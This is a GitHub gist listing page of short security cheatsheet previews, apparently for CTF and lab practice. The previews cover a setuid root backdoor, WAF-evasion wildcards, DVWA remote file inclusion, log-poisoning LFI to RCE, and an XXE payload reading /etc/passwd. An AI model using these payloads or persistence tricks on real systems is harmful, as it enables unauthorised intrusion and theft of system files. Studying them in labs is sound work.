@AvasDream
AvasDream / setuid-root-backdoor.md
Created October 8, 2017 20:58 — forked from dergachev/setuid-root-backdoor.md
How to use setuid to install a root backdoor.

Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.

The obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of the Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account on the system (including www-data, which you might not even know is compromised).

If the "setuid bit" (or flag, or permission mode) is set for an executable, the operating system will run not as the cur

@AvasDream
AvasDream / zabbix_installation.md
Last active August 16, 2018 11:31
Install Zabbix on Raspberry Pi with apache2/mysql

Raspberry Pi 3 Hardware Setup:

Burn Raspbian Lite to the micro SD card using dd if=/path/to/image of=/path/to/sd/card bs=512. If you are on Windows, use Etcher. Raspbian Image Download

First configuration of Raspberry Pi:

Note: A static IP address for your Raspberry Pi is not covered! Check how to do this with your local router.

Configure Keyboard Layout etc. with raspi-config and change the default password (pi/raspberry). Last but not least enable the SSH Service with

@AvasDream
AvasDream / Webapps.md
Last active May 24, 2018 13:12
Web Application cheatsheet

Web Application Firewall Evasion

# One char wildcard
?
# Multiple char wildcard
*


/bin/ls
/???/?s
@AvasDream
AvasDream / dvwaCheatsheet.md
Last active May 24, 2018 12:47
DVWA vulnerabilities cheatsheet

Remote file inclusion

URL: /dvwa/vulnerabilities/fi/?page= [YOUR REMOTE URL]

Condition in /etc/php5/cgi/php.ini:

allow_url_fopen = On
allow_url_include = On

Sometimes you need the NULL-Terminator (%00):

@AvasDream
AvasDream / dvwa_bruteforce.md
Last active May 26, 2018 17:49
DVWA and Burpsuite Cheatsheet

Setting up Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications.

First we have to add the Burp Suite Proxy in our Browser:

Settings -> Advanced Settings -> Network Tab -> Add manual Proxy. Now enter the default values for Burp Suite: 127.0.0.1:8080. Don't forget to check the box "Use this proxy server for all protocols".

Now we disable the captive portal of Firefox. We are doing this to reduce the traffic we will see in our proxy.

@AvasDream
AvasDream / htb.md
Last active October 14, 2024 15:05
Cheatsheet for HackTheBox

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

@AvasDream
AvasDream / lfi_to_rce.md
Last active June 15, 2018 06:34
TYL Local File inclusion to remote code execution

Prerequisites

  1. LFI Vulnerability
  2. Access to the Error or Access Log of the Server.

Example Log Entry

127.0.0.1 "GET /apache_pb.gif HTTP/1.0" "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"

In this entry we see Header Information "Mozilla/4.08 [en] (Win98; I ;Nav)" from a GET Request and this is the place where we add our code.

@AvasDream
AvasDream / XML-external-entity-script.md
Last active July 7, 2018 10:27
Helper Script for exploiting xxe

Basics

Source

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
 mypass

Introduction

To better understand buffer overflows I decided to make and document some exercises on this topic.

The exploit exercises are mainly from exploit-exercises.com.

Stack overflow - When the execution stack grows beyond the memory that is reserved for it.

Buffer overflow - When a program writes beyond the end of the memory allocated for any buffer (heap and stack).

Script for easier installation of Kali tools

Missing Browser Extensions!

  • Built with
  • Foxy Proxy
  • Cache Cleaner
  • Adblocker

Manual execution of install Scripts for Veil and Empire needed.

#! /bin/bash